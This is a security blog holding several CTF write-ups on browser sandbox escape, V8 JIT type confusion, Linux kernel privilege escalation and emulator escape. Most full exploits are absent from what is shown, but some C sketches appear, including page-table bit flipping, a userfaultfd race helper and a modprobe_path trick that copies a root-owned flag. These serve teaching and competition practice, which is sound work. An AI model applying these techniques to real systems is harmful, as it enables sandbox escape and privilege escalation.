
Monday, July 12, 2021

RedpwnCTF 2021 Chromium SBX Tasks Writeup (Empires and Deserts)

This weekend, I participated in RedpwnCTF with my team Starrust Crusaders under the alias "The Static Lifetime Society", coming in second place overall. Since this was my first time doing a Chromium SBX challenge, I thought it would be a good idea to make a writeup. I'm still relatively unfamiliar with Mojo concepts and sbx escape, so feel free to point out any mistakes I make.

Here are some relevant resources I used to help me understand Chromium's architecture and sandbox escape techniques. I would recommend giving them a read before continuing.

Intro to Mojo

NotDeGhost's Intro Post about SBX

Chromium Architectural Overview

Git Repo of Previous Real World SBX Escapes

PlaidCTF Mojo Writeup

Google Quals 2019 Monochromatic Writeup


Empires:

We were given a Chromium binary, mojojs bindings, and a source patch. The only difference between the two parts is that part one is run with the CTF_CHALLENGE_EASY_MODE environment variable set. Chromium is also run with MojoJS bindings enabled. Usually in full-chain exploits, one would have to compromise the renderer first, overwrite the blink::RuntimeEnabledFeatures::is_mojo_js_enabled_ variable, refresh the page, and then attempt to escape the sandbox. Since we already have bindings enabled, we won't have to worry about any of that. Here's the provided patch:

The Wreck struct holds a size, a length_to_use, an optional BigBuffer, and a DesertType enum with variants DESOLATE and EMPTY. Sand is an array of wrecks. The most important struct is Ozymandias, which has the methods Visage and Despair, a pointer reserved for an mmap'd page, and an UnguessableToken. UnguessableTokens are cryptographically secure 128-bit random values. Note that the author commented that the struct is 0x100 bytes, which can be verified by breaking on the new operator in that function (find the mangled name and attach to the main privileged browser process).

The CreateKingofKings function allows us to have the renderer request an interface from the browser process for the Ozymandias objects. Despair loops over the wrecks in a sand argument, allocating a new uint8_t array with a size determined by the wreck's size field. The array is memset to 0 in both options (although the first option doesn't look that way from source, I believe the compiler optimized the argument to 0, as you can see in the disassembly). For the DESOLATE option, if your BigBuffer has data and a size greater than or equal to the wreck's size field, it transfers the contents to the uint8_t array up to the array's size. Then, it creates a base::span (which is like std::span) from the allocated uint8_t array's start and your current wreck's length_to_use field. Visage is a backdoor; it requires a uint8_t vector and an UnguessableToken. If your token matches the current Ozymandias's UnguessableToken, the vector will be copied to an mmap'd rwx page and run as shellcode. One last thing to note is that when disassembling the constructor, you can see the UnguessableToken is a static variable. While randomized across browser instances, it will remain the same within the same browser session.

Since the CTF_CHALLENGE_EASY_MODE env variable is set, we have a trivial heap OOB read because length_to_use can now be bigger than size, and the BigBuffer constructed from the span later will use length_to_use to bound the span. Moreover, the part that is unbounded by size but bounded by length_to_use will remain uninitialized. As the author mentioned, this concept is based on this real-life sbx escape bug.
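To make the bug pattern concrete, here is a minimal C sketch of my own (a simplification, not Chromium's actual code): the copy into the fresh buffer is bounded by size, while the span handed back is bounded by length_to_use, so easy mode leaks whatever heap data lies past the copied region.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct { uint8_t *data; size_t len; } span_t;

/* size          : how big the new buffer is (and how much gets copied)
 * length_to_use : how long the returned span claims to be              */
span_t handle_wreck(const uint8_t *buf, size_t buf_len,
                    size_t size, size_t length_to_use) {
    uint8_t *out = malloc(size);
    memset(out, 0, size);                 /* zeroed up to `size` only            */
    if (buf && buf_len >= size)
        memcpy(out, buf, size);           /* only the first `size` bytes written */
    span_t s = { out, length_to_use };    /* easy mode: length_to_use may exceed */
    return s;                             /* size, so the span runs past the     */
}                                         /* allocation into neighboring heap    */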

Based on these facts, the exploit plan is pretty simple. I don't know much about PartitionAlloc behavior, but it's pretty easy to see from a few leaks of uninitialized memory that chunks of similar sizes get returned in the same regions. This means that we can just spray some Ozymandias objects, then also spray some chunks that allow for the OOB uninitialized read, and leak the token so we can abuse the backdoor.

Now, it should be pretty easy to just send in reverse shell shellcode and escape the sandbox. One issue does remain, though: the mojojs bindings for UnguessableToken require JS numbers, which won't preserve the accuracy of many possible token values. This is a simple patch, however. I performed the following change in the bindings to encode them as doubles:


Then, this was my final exploit (I just used a x86_64 linux rev shell shellcode from shellstorm):


As for the HTML page to send to the browser bot, I used the following (which was based on NotDeGhost's post):


Here was the result from running the exploit on remote from my teammate's VPS (thanks Strellic!):


Deserts:

Now, the env variable is disabled. So what could possibly allow us to leak UnguessableTokens then? I have to admit that this step took an embarrassingly long time.

I first spent several hours reading up on this post about common Chromium IPC vulns and tried to compare them to the diff. Nothing was found this way.

Another idea teammates hypothesized was that maybe there is a TOCTOU race condition between when size and length_to_use are checked and when length_to_use is used. However, data is serialized when passed to the privileged browser process, so racing in the renderer is useless and will not apply changes there (and the window is too small anyway, since we need to abuse sizes of approximately 0x100).

Lastly, what really caught my attention is that if none of the cases in the switch statement are hit, you will still get an uninitialized read. To do that, you need a new enum value, and unfortunately, Mojo validates all enums (unless the keyword extensible is used) along with several other validation checks. I thought this was an interesting scenario since we can change how we send things from the mojojs bindings, and I wanted to see if validation could be bypassed somehow. As I was messing around with wreck types, I noticed that I suddenly achieved a leak when I set my BigBuffer tag to 2, which stands for invalid storage. Debugging the codeflow, I noticed that the contents of the DesertType enum became 0 there somehow (if you set it to zero normally from the renderer before serializing and sending, a validation error will occur and your renderer process will be killed). I wasn't too sure why, but according to NotDeGhost after my solve, it is because this invalid value causes deserialization to fail, so the rest of the struct will not be populated (hence leaving DesertType as 0). The NOTREACHED() statement in the diff is not compiled into release builds, allowing us to trigger this bug and get an uninitialized read when it works with wreck structs.

This time, however, we can't just spray some allocations and have the OOB leak data outside the chunk. We will need to free some OzymandiasImpl objects, which can be done pretty easily with .ptr.reset() since it is an interface implementation. Here is the final exploit:

Here is the result from remote:

Overall, I thought these were amazing challenges that finally pushed me to mess around a bit with Chromium sandbox escapes. Though they are introductory challenges for this complex topic, many of the concepts and basic techniques can probably be re-applied to more difficult sandbox escape challenges.

Here is the author's writeup! Make sure to check it out.


Monday, April 12, 2021

MidnightsunQuals 2021 BroHammer Writeup (Single Bit Flip to Kernel Privilege Escalation)

Last weekend, I played Midnightsun Quals and had a lot of fun with the kernel challenge brohammer. Since I learned a ton of new things from it, I thought it would be nice to make a writeup for it. Before I start, I would like to thank my fellow teammate c3bacd17 for working on this challenge with me and offering amazing insight into how to approach it. As I proceed with the writeup, feel free to let me know if I made any mistakes in my explanations!

Starting off, we notice that KASLR, SMEP, and SMAP are off; this should make exploitation much easier. Additionally, we were given the source:

The kernel had a syscall added that gave us an arbitrary one-bit flip at any specified address. Usually in a CTF, one of the first things to do with bit-flipping challenges is to enable unlimited flips (usually possible due to signed comparisons), but here an unsigned long is used, so achieving unlimited bit flips is impossible (if it were possible, this challenge would have been trivial). Now, the challenge name “brohammer” sounds suspiciously similar to rowhammer, an attack against DRAM to induce bit flips, which can lead to privilege escalation if page table entries are corrupted to point to physical memory containing a page table of the exploit process. We can use a similar idea to target the page directory/table related information.

In this challenge's kernel, 4-level paging is used. According to the Intel Manual Volume 3, Section 4.5, each virtual address maps to a physical address in the following way: the CR3 register stores the physical address of the PML4, and bits 47:39 of the vaddr select the PML4 entry, which holds the physical location of the respective page directory pointer table. Bits 38:30 then select an entry in that table; if the 7th bit (PS flag) is set in the obtained value, the entry just refers to a 1 GB page and the rest of the vaddr bits are used as a linear offset. Otherwise, it provides the pointer to the physical location of a page directory table, and the vaddr's bits 29:21 specify the offset in that table. If the PS bit is set in this obtained value, then it maps a 2 MB page; otherwise, it points to a page table, and the next 9 bits (20:12) of the vaddr select the entry for a 4 KB page, from which the final physical location is obtained.
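For illustration, here is a small C snippet of my own that just makes the bit ranges above concrete by splitting a virtual address into the four table indices and the page offset:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t vaddr = 0xffff880001800000ULL;      /* example: a physmap address */

    uint64_t pml4_idx = (vaddr >> 39) & 0x1ff;   /* bits 47:39 -> PML4 entry                        */
    uint64_t pdpt_idx = (vaddr >> 30) & 0x1ff;   /* bits 38:30 -> PDPT entry (1 GB page if PS set)  */
    uint64_t pd_idx   = (vaddr >> 21) & 0x1ff;   /* bits 29:21 -> PD entry   (2 MB page if PS set)  */
    uint64_t pt_idx   = (vaddr >> 12) & 0x1ff;   /* bits 20:12 -> PT entry   (4 KB page)            */
    uint64_t offset   = vaddr & 0xfff;           /* bits 11:0  -> offset inside the 4 KB page       */

    printf("PML4=%lu PDPT=%lu PD=%lu PT=%lu offset=0x%lx\n",
           pml4_idx, pdpt_idx, pd_idx, pt_idx, offset);
    return 0;
}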

Each entry also holds multiple control bits (refer to Tables 4-14 through 4-20), but for this challenge, what really mattered are the following bits: bit 1 (R/W), bit 2 (User/Supervisor), and bit 63 (NX).

To ease c3bacd17's and my attempts to look through such data, we briefly wrote a parser to dig around physical memory for the aforementioned tables with the help of the QEMU monitor ("pmemsave 0 0x8000000 memdump" to cover the amount of given memory and “info tlb” were really helpful for this challenge, thanks to this writeup of the prequel to this challenge). The first idea I had was to attempt to gain usermode access to kernel memory; the brohammer function sounded like a nice target. Looking at the vaddr to paddr conversion in our parser, we note the following (note this section is mapped as a 2 MB page):


Looking at the bits of the value 0000000000000000000000000000000000000001000000000000000111100001, we thought that we could just set bit 2 to enable usermode access and win! However, that leaves the question of writeability, and additionally, we didn't even gain usermode access there afterwards. Looking at Section 4.6 of the same volume, we discovered the following:

“Access rights are also controlled by the mode of a linear address as specified by the paging-structure entries controlling the translation of the linear address. If the U/S flag (bit 2) is 0 in at least one of the paging-structure entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.”

Well, the page directory table value already violates that rule, so our target will still be considered supervisor-only. The same applies to R/W.

Now, we just kept digging around through the physical memory dump, until c3bacd17 noticed that we could target the physmap as well. Without KASLR, it always starts at the virtual address 0xffff880000000000, and it is a large, contiguous region that behaves as a direct mapping of physical memory (the starting location thus maps to physical address 0).


Notice how the entire chain so far has the usermode and writeable bits set, and how the entry at 0x18fb060 holds 0x18001e3, which has the PS bit set (2 MB page) as well as the writeable bit. If we toggle the usermode bit, then we can actually modify a large portion of memory (2 MB, starting from physical address 0x1800000) from userspace. This is really useful, as this region holds the physical address 0x18fb040, which contains the page directory entry for where the kernel loads in memory (another 2 MB page), since 0x1000000 is the default physical load address for the Linux kernel; the address of startup_64 from kallsyms and 0xffff880001000000 (direct offset from physmap to the default kernel physical load address) map to the same physical location.

At this point, our exploitation strategy is ready to go. We flip the usermode bit on for the page directory entry at 0x18fb060 to enable usermode access to this region of page-directory-related information. Now, with usermode access there, we can flip the writeable and usermode bits for the entry at 0x18fb040, and by referencing the offset of the brohammer function from the kernel base vaddr via physmap, we can rewrite the code there due to the changed permissions. I just injected a simple commit_creds(init_cred) shellcode. Here is the final exploit:


Interestingly enough, as a few other players pointed out, the TLB caches permissions for the virtual to physical mappings as well, so this would have been problematic for the exploit in real life (QEMU's behavior isn't exactly correct here, I believe). However, Section 4.10.4.3 mentions how it would actually work fine after the first access attempt (which triggers a spurious page fault).
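For readers reconstructing the exploit, the whole sequence boils down to something like the following heavily hedged C sketch. The added syscall's number and argument order are my assumptions (the real interface comes from the challenge source), and the shellcode and function offset are left as placeholders; the physical offsets are the ones from the dump above.

#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#define SYS_brohammer 333                      /* hypothetical syscall number            */
#define PHYSMAP       0xffff880000000000UL     /* direct map base without KASLR          */

int main(void) {
    /* 1. The single bit flip: set the U/S bit (bit 2) of the PDE at phys 0x18fb060,
     *    making the 2 MB physmap page covering phys 0x1800000 user-accessible.       */
    syscall(SYS_brohammer, PHYSMAP + 0x18fb060, 2);

    /* 2. That 2 MB page contains the page tables themselves, so from userspace we
     *    can now set U/S and R/W on the PDE (phys 0x18fb040) that maps the kernel's
     *    load address (phys 0x1000000) through physmap.                              */
    volatile uint64_t *kernel_pde = (uint64_t *)(PHYSMAP + 0x18fb040);
    *kernel_pde |= (1UL << 2) | (1UL << 1);

    /* 3. Kernel text is now writable via its physmap alias: patch brohammer() with
     *    commit_creds(&init_cred) shellcode, then invoke the syscall again.          */
    uint8_t shellcode[] = { 0x90 /* ... commit_creds(init_cred) stub goes here ... */ };
    memcpy((void *)(PHYSMAP + 0x1000000 /* + offset of brohammer */), shellcode,
           sizeof(shellcode));
    return 0;
}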

Thanks once again for the interesting challenge, as well as my teammate c3bacd17 for working with me and proofreading this writeup!


Tuesday, April 6, 2021

Turboflan PicoCTF 2021 Writeup (v8 + introductory turbofan pwnable)

This year, picoCTF 2021 introduced a series of browser pwns. The first of the series was a simple shellcoding challenge, and the second one was another baby v8 challenge with unlimited OOB indexing (about the same difficulty as the v8 pwnable from my Rope2 writeup - I recommend reading that if you are unfamiliar with v8 exploitation), but what really caught my attention was the last browser pwnable, turboflan, which involved a bug in the Turbofan JIT optimizer in Chromium. For those unfamiliar with Turbofan, the following post from Jeremy Fetiveau is a nice read. I myself am still quite new to Turbofan vulnerabilities, so please let me know if I made a mistake in my explanations.

Looking at the patch file, we see the following changes:


The most important change is the first part, in effect-control-linearizer.cc's LowerCheckMaps(). When running code, v8 first generates Ignition bytecode, and if the code runs enough times, Turbofan JIT-compiles it based on the types it has previously seen. When the optimized function encounters a new type, it should usually deoptimize to avoid the dangers of type confusion.

In the patch above, the challenge author specifically removed that deoptimization condition for when the map is different. This can easily lead to a bug by confusing 64 bit float arrays and object arrays (which consist of 32 bit pointers due to pointer compression).

Let's now try to trigger the bug in the provided d8 (with --allow-natives-syntax --trace-turbo --trace-opt --trace-deopt).

The first POC can be as simple as this:


Running in a d8 shell results in the following:

The type confusion did not happen here; in fact, there doesn't even seem to be any optimization of the function in play here. Doing a bit more digging with %DisassembleFunction in an up-to-date debug d8 showed that bug() simply got inlined. Turbofan most likely caught this type change early on (in fact, around or before the BytecodeGraphBuilder phase according to Turbolizer), hence causing it to just deoptimize as soon as the loop was finished.

Knowing this, my next goal was to prevent inlining, and intuitively, it makes sense to just make the bugged function more complex to prevent such compiler behavior. I just tossed in a random for loop and the inlining went away.


This time, we can see a type confusion in action:

In fact, just out of curiosity, let us compare the Turbolizer outputs (this graph analysis tool was really not necessary for this challenge, but becomes very important for any harder Turbofan bug) between this bugged d8 and a normal d8.

In a normal d8, in TFEffectLinearization, the graph looks like the following:


In the bugged d8, the following is seen:


Notice how there is one less deoptimize condition node. One of the DeoptimizeUnless nodes in normal d8 is precisely where a check for a wrong map occurs. 



Now, let's begin to build some primitives that will eventually lead us to the addrof and fakeobj primitives. I created the following functions to help trigger the JIT bug:


Note that we are simply abusing type confusion between 64 bit float arrays and 32 bit object arrays (as pointers are now 32 bits due to pointer compression) here; we are not going out of bounds of the array length, as that would trigger a deoptimization due to other checks. Now, if we try to access idx 1 from an object array of 2 elements, it will actually hit arr[2] in the actual object array because the JIT code has been optimized for 64 bit arrays (similar to the Rope2 bug mentioned in a previous writeup).

Knowing the above behavior of the bug, we can easily leak the map of an object array (as well as the property pointer of fixed arrays, since a confused 64 bit read/write will encounter both when going out of bounds). In at least all pointer-compression-based versions of v8 that I have seen, the float array map is at a constant offset from the object array map (0x50 specifically), so we will also now have a float array map address.


At this point, addrof and fakeobj are trivial to achieve. To grab the address of any object, we fill an object array of size 2 with the target object. Then, using the confused_write method, we can OOB write and replace the object array's map pointer with a float array map pointer (while also preserving the fixed array property, though this step isn't necessary most of the time). Now, returning indices from our array will leak the object addresses (one should restore the original array state afterwards for stability's sake).

fakeobj is even simpler. We can just use confused_write without OOB to directly change the addresses in the object array due to the type confusion, and return the new objects.


Now, arb read and arb write can be achieved. Unlike in my previous Rope2 writeup, I have since discovered that map pointers can constantly be reused, making these primitives much easier to build. For both primitives, you create a float array with the first element holding a map pointer. Then you create a fake object over the part of memory holding those values, edit the array (with the original array object) to modify where the length and the element pointer would be, and now indexing into the fake object gives you arb read and arb write.

The rest of the exploit becomes a generic Chrome exploit procedure without a sandbox: initialize a wasm instance to create an rwx page, get the address of the wasm instance object, arb read its 64 bit pointer to the rwx page, and write shellcode outside the v8 heap (into the wasm page) by changing the 64 bit backing store pointer of an ArrayBuffer (using a DataView to write to it). Then, calling the wasm function should trigger the shellcode. Sadly, the remote wasn't set up with an actual Chrome (it only used d8), had strict firewall rules (so no reverse shells or bind shells), and would only let us see the stdout and stderr after running d8 (so no shell popping either); I just had to do an open-read-write shellcode :(

Here is my final exploit:


Overall, this was a very nice browser challenge to interest people into turbofan related bugs; thanks to the author wparks for making this pwnable and helping me clear up a few v8 related questions post-solve and my teammate pottm for the thorough proofread! These tasks were a refreshing change from the usual heap notes PicoCTF is famous for (though there were more format string tasks, which honestly are a crime against the category of pwn at this point and should just be removed from CTFs).  For those interested in more advanced and realistic Turbofan challenges, I highly recommend the challenge Modern Typer made by Faith on HackTheBox.

Sunday, March 7, 2021

zer0pts CTF 2021 Nasm-Kit Writeup (unicorn engine emulator escape)

This weekend, I played in Zer0pts CTF with my team Crusaders of Rust (aka Richard Stallman and Rust during the competition). Perhaps the most interesting task my friend c3bacd17 and I solved was nasm-kit, which required us to escape an x86_64 emulator written with the unicorn engine.

To start off, we were given source:

Looking over the code, it basically emulates the x86 instructions you send in. You only have 0x1000 bytes at most, and there is a code and a stack region set up by unicorn. There are a few handlers for segfaults and interrupts (which both terminate the program), a special syscall handler, and registers are initialized to zero at the beginning. It also prints out your register state when the emulated process crashes (great for debugging!), and only allows mmap, munmap, write, exit, read, and exit_group in the syscall handler. Notice that the return values for all these syscalls are made non-standard by the handler. There's not really any vulnerable code here (I briefly considered that the mismatched new and delete operators in C++ could create issues, but I don't think it could lead to much here).

Below is the server side handler for the process.

Note that we can only send in NASM code, and it attaches the lines necessary for 64 bit assembly. Your NASM code length must be under 0x1000, and incbin as well as macros are disabled. The filename for this is also randomized.

So, where exactly is the bug? Well, back in *CTF 2021, there was a riscv64 QEMU userland "escape" challenge (Favorite Architecture 2) that I did, and I remember that the emulated process could access the emulator's memory mappings; of course, unicorn engine is more strict, but a similar idea does work. Since we do have mmap, this is probably what we can abuse.

Looking through the mmap manpages, a few flags caught my attention. MAP_FIXED allows me to replace pre-existing memory pages, and MAP_FIXED_NOREPLACE is the same as MAP_FIXED but won't replace existing memory, instead returning an error if a collision happens (the "fixed" part means that you want mmap to take your requested address literally rather than as a hint).

Using these two concepts, we can easily find the emulator's mappings even under ASLR. For example, to get the ELF base with PIE, we can perform a search from 0x550000000000 with MAP_FIXED_NOREPLACE, using smaller length requests as you move from the higher-order digits to the lower-order ones and checking for collisions. One could also write a binary search, but I was working on this challenge at 2 AM and was simply too tired to bother doing so.
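As a rough host-side illustration of the collision probing (inside the emulator the syscall return values are munged by the handler, so the checks look different, but the MAP_FIXED_NOREPLACE trick is the same):

#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>

/* Returns 1 if [addr, addr+len) collides with an existing mapping. */
static int occupied(uint64_t addr, size_t len) {
    void *p = mmap((void *)addr, len, PROT_NONE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE, -1, 0);
    if (p == MAP_FAILED)
        return 1;            /* EEXIST: something already lives here */
    munmap(p, len);          /* clean up the probe                   */
    return 0;
}

int main(void) {
    /* Naive linear scan of a candidate region in 4 KiB steps; a coarse-to-fine
     * search over larger lengths (as described above) is much faster.          */
    for (uint64_t a = 0x7f0000000000UL; a < 0x7f0000100000UL; a += 0x1000)
        if (occupied(a, 0x1000)) {
            printf("mapping found at 0x%lx\n", a);
            break;
        }
    return 0;
}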

Then, once you have some mapping addresses from the emulator, you can abuse MAP_FIXED to forcibly replace emulator pages. However, since we do not have open or openat to make a new fd, we have to use MAP_ANONYMOUS, which will null out the pages. c3bacd17 and I originally considered writing the shellcode for the shell elsewhere in the nasm file, and then using our file's fd with the offset option to control the new memory there immediately, but the file is closed as soon as the code is read. Another potential way is to find some section of code that isn't usually used during emulation, mmap over that region, write arbitrary shellcode there, and then hope it triggers later on without breaking the process. This is what we did, but it took some bruteforcing and fiddling.

In my exploit, rather than searching for the ELF base (as I could not find a good page to perform the aforementioned attack on in the binary itself), I searched for libc. I began my search at 0x7f0000000000 and hunted for the third page mapped in that region, as that was a constant offset from libc base due to the behavior of mmap during program initialization. The offset does vary across systems, so some bruteforce is necessary when going from local to remote. The first two pages in that range were not at a constant offset from libc base; I believe those are used by the unicorn engine but am not completely sure.

In libc itself, I chose one of the earlier 0x1000 pages of the .text segment, mmap'd over it, and filled the entire region with nops before ending it with a jmp to my shellcode (which I mmap'd at 0x13370000). This nop sled should really help with reliability, and upon ending the emulated process in my shellcode, a shell did pop!

Here is my exploit:

Of course, for remote, you will need to encode this in NASM format. c3bacd17 wrote the following script to just encode the raw binary as dq words to send to the server.

The script generated the following as our final payload:

And after a few tries since my mmap search was slightly slow, I ended up popping a shell!

Thanks to ptr-yudai for this wonderful challenge, and the rest of the zer0pts CTF team for this amazing CTF!

Sunday, February 7, 2021

DiceCTF 2021 HashBrown Writeup: From Kernel Module Hashmap Resize Race Condition to FG-KASLR Bypass

This was the first time DiceCTF has been hosted (by DiceGang), and overall, I think it was quite a successful experience and the CTF had a high level of difficulty. I wrote a single challenge called HashBrown, which had 7 solves total. I thought I would make a brief writeup to summarize the intended path (which most solvers took).


The following is the challenge description.

The kernel version was 5.11, with SMEP, KPTI, and SMAP on. SMEP and KPTI aren't really big deals, but SMAP can make the process more painful.

Setting CONFIG_SLAB causes the kernel to not use the traditional default SLUB allocator (which keeps the freelist linked list metadata on the kernel heap); instead it uses the older SLAB allocator, which doesn't keep metadata on the heap (but rather in a slab manager that stores freed indices in the kmem_bufctl_t field). SLAB_FREELIST_RANDOM applies to both the SLAB and SLUB allocators, and is usually set in the kernels used in common distros (such as Ubuntu). I've run into that feature multiple times during kernel exploits: instead of having a nice linear heap that provides allocations in a deterministic order, the freelist order is scrambled and randomized upon initialization of new pages. Opening the module in GHIDRA/Binja/IDA also clearly reveals that usercopy is hardened.

The most important addition to this kernel challenge is FG-KASLR (I was inspired by HXP CTF's kernel ROP challenge that had FG-KASLR), which is a non-mainline kernel security feature that provides extra randomization on top of KASLR. Usually, even with ASLR, you can rebase an entire binary from a leak by using the non-ASLR'd offsets. FG-KASLR brings an extra layer of protection (while also adding a second to the boot time) by compiling many of the functions into their own sections and re-scrambling all the sections during boot. Offset leaks are no longer deterministic, but FG-KASLR only applies to functions that satisfy the following criteria: the function is written in C and is not in a few special sections. Pointers to kernel data or some of the earlier parts of kernel code (and, I think, even the KPTI trampoline that is useful in exploitation) remain at a constant offset from kernel base.

Now, let's take a look into the provided source code (players seem to have more fun with pwn when there is less reversing, so I released it 2 hours into the CTF):

To summarize the codebase, it is basically a hashmap in a driver that can hold a maximum of 0x400 entries with a maximum array size of 0x200. The threshold is held at 0.75 and the hash function is copied from the JDK codebase before version 8. The overall code is also quite safe, as double frees, null dereferences, etc. are all checked throughout, and the linked list operations are also safe when collisions occur in the hashmap buckets. Size and error checks are also performed, and kzalloc() is used to null out newly allocated regions (to prevent leaks and such). However, having two mutex locks - one for resize and one for all other hashmap operations - is quite strange, so perhaps it is a good idea to take a closer look at the resize function.
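For reference, the supplemental hash that java.util.HashMap used before JDK 8 (which the driver's hash function is described as copying) looks roughly like this in C; treat the exact constants as my assumption and check the module itself:

#include <stdint.h>

static uint32_t jdk_hash(uint32_t h) {
    /* pre-JDK-8 java.util.HashMap supplemental hash */
    h ^= (h >> 20) ^ (h >> 12);
    return h ^ (h >> 7) ^ (h >> 4);
}

static uint32_t bucket_index(uint32_t h, uint32_t table_len) {
    return jdk_hash(h) & (table_len - 1);   /* table_len is a power of two */
}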

When resize is triggered, a new hashmap with an array twice as large as the old one is initialized, but the global hashmap struct does not have its bucket field replaced yet. In order to not corrupt the linked lists in the previous hashmap or lose hash entries, the module has to allocate new hash entries and copy over the data (including the value pointer of the key-value pair of each hashmap entry), and then place them in the newly allocated hashmap bucket accordingly (debugging this structure can be somewhat painful, so perhaps writing a gdb Python handler can help). If the new request from the user is also valid, resize proceeds to copy the data over from userland. Then, all the old hash_entries are freed (but not the values, as that wouldn't make sense) and the old bucket is freed, before the global hashmap has its bucket array replaced.

While the resize function does sound safe, let us go back to the point about the 2 mutexes. Notice how a race condition can be created here? If we can get the hashmap resize to trigger and have it copy over values while also deleting a value (that has already been copied over) from the current buckets, we can create a UAF scenario! If one mutex were used instead, or the bucket were replaced immediately in resize, this would not be an issue. I was hoping this would make for a more interesting CTF challenge bug, rather than a standard obvious heap note UAF or overflow-by-X scenario.

Now that we know the bug, we can come up with an exploitation plan. The first thing we need to do is create a stable race scenario; otherwise the success rate will be quite low and you will run out of resize operations really quickly. This is quite easy, as an add request when the threshold limit is hit causes the userland copy for the new entry to be handled inside resize(). We can use the classic userfaultfd page fault technique to hang kernel threads on the userland copy, as sketched below.
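Here is a minimal userfaultfd sketch (my own hedged helper, not the exact exploit code): register a page, pass it as the value buffer for the add that triggers resize, and when the kernel's copy_from_user faults on it, that kernel thread blocks until we resolve the fault, giving us a wide race window.

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

static void *uffd_handler(void *arg) {
    int uffd = (int)(long)arg;
    struct uffd_msg msg;
    read(uffd, &msg, sizeof(msg));            /* blocks until the fault fires */

    /* ... race body goes here: delete the already-copied value from another
     *     thread, shmat to spray shm_file_data, etc. ...                     */

    static char zeroes[0x1000];
    struct uffdio_copy cp = {
        .dst = msg.arg.pagefault.address & ~0xfffUL,
        .src = (unsigned long)zeroes,
        .len = 0x1000,
    };
    ioctl(uffd, UFFDIO_COPY, &cp);            /* resolve the fault, resume kernel */
    return NULL;
}

void *setup_uffd_page(void) {
    int uffd = syscall(SYS_userfaultfd, O_CLOEXEC);
    struct uffdio_api api = { .api = UFFD_API };
    ioctl(uffd, UFFDIO_API, &api);

    void *page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    struct uffdio_register reg = {
        .range = { .start = (unsigned long)page, .len = 0x1000 },
        .mode  = UFFDIO_REGISTER_MODE_MISSING,
    };
    ioctl(uffd, UFFDIO_REGISTER, &reg);

    pthread_t t;
    pthread_create(&t, NULL, uffd_handler, (void *)(long)uffd);
    return page;                              /* pass this as the value buffer */
}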

On a side note, that setting (allowing unprivileged userfaultfd) has been the default for a very long time, but it was actually disabled in the 5.11 release candidate codebase; I had to make a one line patch in the kernel to revert it to the traditional behavior, but did not mention that in the description, as it is trivially easy to check the setting at runtime, explicitly changing it in the init script would spoil the challenge, and building the kernel with FG-KASLR on other versions was a mess.

Since the value allocations are capped at 0xb0, there is a limited range of useful kernel structures we can use to obtain leaks. A potential go-to would be seq_operations, but it only holds 4 function pointers, which are all affected by FG-KASLR. I used shm_file_data instead, which contains pointers to kernel data. To leak it, we allocate just enough to hit the first threshold limit, and then trigger a resize. Once the resize function finishes copying over all the old hash_entries (including the value pointers), we use the uffd technique to hang it, delete a value in another thread, and use shmat to trigger an allocation of shm_file_data. After resize, we can still read that pointer value and will be able to rebase to find the kernel base.

In order to obtain arb write, we can follow a similar plan to the one used for the leak. However, as SMAP is enabled, our options for gaining arb exec are quite limited. One nice technique to bypass SMAP is to overwrite some of the writeable strings the kernel uses in conjunction with usermode helper functions; modprobe_path is probably the most famous one, but many others also exist. We should use the race condition to UAF a kmalloc-32 chunk to eventually overwrite the value pointer of a hash_entry that is allocated later. It is important to note that all the hash_entries in the current global bucket are freed as well, so the UAF'd chunk will not be the first chunk returned; you can easily check when you have control over a hash_entry by repeatedly using get_value. I noticed that the returning order of the freelist was somewhat deterministic, but recall that this order was also scrambled in a previous kernel challenge; please let me know if you can clarify this part for me, but I believe it is because a new page is not needed (and hence, shuffling doesn't occur).
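For completeness, the modprobe_path trick looks roughly like this once a write primitive exists (the paths and the arb_write signature here are hypothetical placeholders for whatever the UAF'd hash_entry value pointer gives us):

#include <stdlib.h>

/* arb_write: whatever write primitive the UAF'd value pointer provides. */
void win_via_modprobe(void (*arb_write)(unsigned long addr, const void *buf, int len),
                      unsigned long modprobe_path) {
    /* 1. Point modprobe_path at a script we control (include the NUL byte). */
    arb_write(modprobe_path, "/tmp/x.sh", 10);

    /* 2. Executing a file with an unknown magic makes the kernel run the
     *    "modprobe" helper (now our script) as root.                        */
    system("echo '#!/bin/sh' > /tmp/x.sh");
    system("echo 'cp /root/flag /tmp/flag; chmod 666 /tmp/flag' >> /tmp/x.sh");
    system("chmod +x /tmp/x.sh");
    system("printf '\\xff\\xff\\xff\\xff' > /tmp/trigger; chmod +x /tmp/trigger");
    system("/tmp/trigger");          /* exec fails, kernel invokes /tmp/x.sh */
    system("cat /tmp/flag");
}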

Here is my final exploit and the result of running the exploit:

Another interesting solution I saw came from LevitatingLion of the RedRocket CTF team. The exploit used a nice arb read/write primitive to start scanning kernel memory at 0xffffffffc0000000 for kernel data and the modprobe string (like a pseudo egg hunt) to bypass FG-KASLR.

Feel free to let me know if any of my explanations were wrong, or let me know if you have any questions. Congrats to Pernicious from RPISEC for taking first blood and D3v17 for doing last minute testing for me! Thanks once again to all those who participated in DiceCTF and fellow organizers (especially the infra people asphyxia and ginkoid), and make sure to check out the other writeups, such as kmh's extreme pyjail challenge TI1337 Plus CE, defund's crypto challs, and NotDeGhost's Chromium sandbox escape challenge Adult CSP.

Saturday, January 16, 2021

Rope2 HackTheBox Writeup (Chromium V8, FSOP + glibc heap, Linux Kernel heap pwnable)

Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.

